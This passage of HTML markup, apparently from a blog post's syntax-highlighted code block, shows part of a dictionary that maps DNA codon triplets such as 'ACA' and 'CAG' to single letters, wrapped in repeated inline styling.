normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'d'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'ACA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'e'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'ACC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'f'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'ACG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'g'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'ACT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'h'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'AGA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'i'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'AGC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'j'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'AGG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'k'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'AGT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'l'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'ATA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'m'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'ATC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'n'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'ATG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'o'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'ATT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'p'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CAA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'q'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CAC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'r'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CAG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'s'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CAT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'t'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CCA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'u'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CCC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'v'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CCG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'w'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span 